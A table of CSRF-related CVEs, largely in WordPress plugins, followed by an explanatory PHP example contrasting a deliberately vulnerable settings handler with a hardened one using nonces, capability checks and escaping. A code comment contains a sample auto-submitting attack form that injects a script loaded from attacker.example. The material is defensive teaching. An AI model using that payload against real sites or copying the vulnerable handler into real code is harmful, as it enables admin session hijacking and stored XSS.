Total: 7283 CVEs
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description |
---|---|---|---|---|---|---|
CVE-2015-20105 | 1 Cbads | 1 Clickbank Affiliate Ads | 2024-11-21 | 6.8 MEDIUM | 9.6 CRITICAL | The ClickBank Affiliate Ads WordPress plugin through 1.20 does not have a CSRF check when saving its settings, allowing an attacker to make a logged-in admin change them via a CSRF attack. Furthermore, due to the lack of escaping when they are output, this could also lead to Stored Cross-Site Scripting issues. |
CVE-2015-1785 | 1 Imagely | 1 Nextgen Gallery | 2024-11-21 | 4.3 MEDIUM | 6.5 MEDIUM | In the nextgen-gallery WordPress plugin before 2.0.77.3 there are two vulnerabilities which can allow an attacker to gain full access to the web application. The vulnerabilities lie in how the application validates user-uploaded files and in the lack of security measures preventing unwanted HTTP requests. |
CVE-2015-1583 | 1 Atutor | 1 Atutor | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | Multiple cross-site request forgery (CSRF) vulnerabilities in ATutor 2.2 allow remote attackers to hijack the authentication of administrators for requests that (1) create an administrator account via a request to mods/_core/users/admins/create.php or (2) create a user account via a request to mods/_core/users/create_user.php. |
CVE-2015-1391 | 1 Hp | 1 Airwave | 2024-11-21 | N/A | 8.8 HIGH | Aruba AirWave before 8.0.7 allows bypass of a CSRF protection mechanism. |
CVE-2015-10125 | 1 Smackcoders | 1 Import All Pages, Post Types, Products, Orders, And Users As Xml & Csv | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM | A vulnerability classified as problematic has been found in WP Ultimate CSV Importer Plugin 3.7.2 on WordPress. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 3.7.3 is able to address this issue. The identifier of the patch is 13c30af721d3f989caac72dd0f56cf0dc40fad7e. It is recommended to upgrade the affected component. The identifier VDB-241317 was assigned to this vulnerability. |
CVE-2015-10116 | 1 Realfavicongenerator | 1 Favicon By Realfavicongenerator | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM | A vulnerability classified as problematic has been found in RealFaviconGenerator Favicon Plugin up to 1.2.12 on WordPress. This affects the function install_new_favicon of the file admin/class-favicon-by-realfavicongenerator-admin.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 1.2.13 is able to address this issue. The identifier of the patch is 949a1ae7216216350458844f50a72f100b56d4e7. It is recommended to upgrade the affected component. The identifier VDB-230661 was assigned to this vulnerability. |
CVE-2015-10109 | 1 Cincopa | 1 Video And Media Plug-in | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM | A vulnerability was found in Video Playlist and Gallery Plugin up to 1.136 on WordPress. It has been rated as problematic. Affected by this issue is some unknown functionality of the file wp-media-cincopa.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 1.137 is able to address this issue. The name of the patch is ee28e91f4d5404905204c43b7b84a8ffecad932e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230264. |
CVE-2015-10108 | 1 Inline Google Spreadsheet Viewer Project | 1 Inline Google Spreadsheet Viewer | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM | A vulnerability was found in meitar Inline Google Spreadsheet Viewer Plugin up to 0.9.6 on WordPress and classified as problematic. Affected by this issue is the function displayShortcode of the file inline-gdocs-viewer.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 0.9.6.1 is able to address this issue. The patch is identified as 2a8057df8ca30adc859cecbe5cad21ac28c5b747. It is recommended to upgrade the affected component. VDB-230234 is the identifier assigned to this vulnerability. |
CVE-2015-10081 | 1 Submitbymailplugin Project | 1 Submitbymailplugin | 2024-11-21 | 5.0 MEDIUM | 4.3 MEDIUM | A vulnerability was found in arnoldle submitByMailPlugin 1.0b2.9 and classified as problematic. This issue affects some unknown processing of the file edit_list.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 1.0b2.9a is able to address this issue. The patch is named a739f680a1623d22f52ff1371e86ca472e63756f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-221495. |
CVE-2015-10001 | 1 Wp-stats Project | 1 Wp-stats | 2024-11-21 | 4.3 MEDIUM | 4.3 MEDIUM | The WP-Stats WordPress plugin before 2.52 does not have a CSRF check when saving its settings, and does not escape some of them when outputting them, allowing an attacker to make logged-in high-privilege users change them and set Cross-Site Scripting payloads. |
CVE-2015-0151 | 1 Dlink | 2 Dir-815, Dir-815 Firmware | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | Cross-site request forgery (CSRF) vulnerability in D-Link DIR-815 devices with firmware before 2.07.B01 allows remote attackers to hijack the authentication of arbitrary users for requests that insert XSS sequences. |
CVE-2014-9502 | 1 Open Atrium Project | 1 Open Atrium | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | Multiple cross-site request forgery (CSRF) vulnerabilities in unspecified sub-modules in the Open Atrium module 7.x-2.x before 7.x-2.26 for Drupal allow remote attackers to hijack the authentication of unknown victims via vectors related to menu callbacks. |
CVE-2014-9382 | 1 Free | 1 Freebox Os | 2024-11-21 | 4.3 MEDIUM | 6.5 MEDIUM | The Freebox OS Web interface 3.0.2 has a CSRF vulnerability which can allow VPN user account creation. |
CVE-2014-8942 | 1 Piwigo | 1 Lexiglot | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | Lexiglot through 2014-11-20 allows CSRF. |
CVE-2014-7198 | 1 Openmicroscopy | 1 Omero | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | OMERO before 5.0.6 has multiple CSRF vulnerabilities because the framework for OMERO's web interface lacks CSRF protection. |
CVE-2014-6046 | 1 Phpmyfaq | 1 Phpmyfaq | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | Multiple cross-site request forgery (CSRF) vulnerabilities in phpMyFAQ before 2.8.13 allow remote attackers to hijack the authentication of unspecified users for requests that (1) delete active users by leveraging improper validation of CSRF tokens or that (2) delete open questions, (3) activate users, (4) publish FAQs, (5) add or delete Glossary entries, (6) add or delete FAQ news, or (7) add or delete comments or add votes by leveraging the lack of a CSRF token. |
CVE-2014-5516 | 1 Konakart | 1 Konakart | 2024-11-21 | 4.3 MEDIUM | 6.5 MEDIUM | Cross-site request forgery (CSRF) vulnerability in the Storefront Application in DS Data Systems KonaKart before 7.3.0.0 allows remote attackers to hijack the authentication of administrators for requests that change a user email address via an unspecified GET request. |
CVE-2014-5288 | 1 Kemptechnologies | 1 Load Master | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | A CSRF vulnerability exists in Kemp Load Master before 7.0-18a via unspecified vectors in administrative pages. |
CVE-2014-5280 | 1 Boot2docker | 1 Boot2docker | 2024-11-21 | 9.3 HIGH | 8.8 HIGH | boot2docker 1.2 and earlier allows attackers to conduct cross-site request forgery (CSRF) attacks by leveraging Docker daemons enabling TCP connections without TLS authentication. |
CVE-2014-5072 | 1 Wpsecurityauditlog | 1 Wp Security Audit Log | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH | Cross-site request forgery (CSRF) vulnerability in WP Security Audit Log plugin before 1.2.5 for WordPress allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. |
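The WordPress plugin entries in this table (CVE-2015-20105, CVE-2015-10001 and the VulDB-sourced plugin records) share one pattern: an admin settings handler that trusts a POST body without a nonce or capability check, and then echoes the stored value back without escaping, so a forged request both changes settings and plants stored XSS. The PHP below is an added example written for this page; it is not code from any of the plugins listed. The `cbex_` prefix, the option name `cbex_tracking_id`, the nonce action `cbex_save_settings`, the form field names and the hostnames in the comments are all hypothetical.

```php
<?php
// Added example for this page, not code from any listed plugin.
// Hypothetical plugin prefix "cbex_"; option, nonce action and field names are made up.

// What the attack looks like (constructed, hostnames hypothetical): a page the
// logged-in admin merely visits. The browser attaches the wp-admin cookies, the
// vulnerable handler saves the value, and the unescaped echo turns it into stored XSS.
//
//   <form id="f" method="POST"
//         action="https://victim.example/wp-admin/options-general.php?page=cbex">
//     <input name="cbex_tracking_id"
//            value='"><script src="//attacker.example/x.js"></script>'>
//   </form>
//   <script>document.getElementById('f').submit()</script>

// ---------- Vulnerable pattern (illustrative only, do not ship) ----------
function cbex_settings_page_vulnerable() {
    if ( isset( $_POST['cbex_tracking_id'] ) ) {
        // No nonce check: any cross-site POST carrying the admin's cookies is accepted.
        // No capability check: the callback trusts the menu registration alone.
        update_option( 'cbex_tracking_id', $_POST['cbex_tracking_id'] );
    }
    $id = get_option( 'cbex_tracking_id', '' );
    // Unescaped output: a value containing "> breaks out of the attribute.
    echo '<form method="post"><input name="cbex_tracking_id" value="' . $id . '">'
       . '<button type="submit">Save</button></form>';
}

// ---------- Hardened pattern ----------
function cbex_settings_page_hardened() {
    // 1. Authorization: nonces prove intent, not privilege, so check both.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'cbex' ), 403 );
    }

    if ( isset( $_POST['cbex_tracking_id'] ) ) {
        // 2. CSRF: check_admin_referer() verifies the nonce bound to this action and
        //    the current user's session and dies with 403 if it is missing or stale.
        check_admin_referer( 'cbex_save_settings', 'cbex_nonce' );

        // 3. Input validation on save: strip slashes WP adds, normalise, then accept
        //    only the character set an affiliate/tracking ID can legitimately contain.
        $clean = sanitize_text_field( wp_unslash( $_POST['cbex_tracking_id'] ) );
        if ( ! preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $clean ) ) {
            wp_die( esc_html__( 'Invalid tracking ID.', 'cbex' ), 400 );
        }
        update_option( 'cbex_tracking_id', $clean );
    }

    $id = get_option( 'cbex_tracking_id', '' );

    // 4. Output escaping: esc_attr() for attribute context, regardless of what was
    //    validated on the way in (older or migrated values may not have been).
    echo '<form method="post">';
    wp_nonce_field( 'cbex_save_settings', 'cbex_nonce' );
    echo '<input name="cbex_tracking_id" value="' . esc_attr( $id ) . '">';
    echo '<button type="submit">' . esc_html__( 'Save', 'cbex' ) . '</button></form>';
}

// Register only the hardened page; the vulnerable function is kept for contrast.
add_action( 'admin_menu', function () {
    add_options_page(
        'CB Example Settings',   // page title
        'CB Example',            // menu title
        'manage_options',        // capability required to see the page
        'cbex',                  // menu slug
        'cbex_settings_page_hardened'
    );
} );
```

Two points worth keeping in mind when reviewing a plugin against this table: a WordPress nonce is a time-limited, per-user token rather than a one-time value, so it defends against forged requests but not against an attacker who already executes script in the admin's session; and a nonce check without `current_user_can()` (or the reverse) leaves one of the two gaps open, since the nonce only proves the request came from a form the plugin rendered for that user, not that the user was allowed to submit it.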